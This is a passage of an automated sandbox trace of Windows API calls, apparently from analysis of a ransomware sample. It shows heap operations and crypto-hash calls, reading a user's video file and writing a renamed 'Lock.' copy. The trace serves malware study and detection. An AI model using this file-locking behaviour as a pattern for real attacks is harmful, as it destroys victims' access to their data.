(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.095] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.096] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.096] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.096] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.096] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.097] CryptDestroyHash (hHash=0xaa5960) returned 1 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.097] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.097] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/4Qauyoz6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4qauyoz6.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0257.099] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0257.099] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0257.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0257.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.101] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0257.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0257.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.4Qauyoz6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.4qauyoz6.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0257.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0257.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0257.105] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0257.105] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xa6ab, lpOverlapped=0x0) returned 1 [0257.107] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0257.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa6ab) returned 0x24b7a48 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0257.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa6ab) returned 0x24c2100 [0257.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0257.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa6ab) returned 0x24b7a48 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.114] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0257.114] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.114] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0257.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 